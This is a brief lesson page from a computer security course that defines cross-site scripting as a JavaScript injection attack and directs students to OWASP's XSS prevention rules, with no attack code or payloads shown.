Computer Security :: Lessons :: Cross-Site Scripting
Cross-Site Scripting
Javascript is another vector that can be used to attack a web application. Cross-site scripting (XSS) are the Javascript version of an injection attack. Malicious scripts are injected into trusted websites that allow user input. The video below shows some examples of XSS attacks and some simple prevention measures.
The Open Web Application Security Project has a list of XSS prevention rules. Not every rule will apply to your web application, but you need to make sure you protect your web app against any XSS attacks it is vulnerable to. There is more specific information in the link to implement XSS prevention strategies.
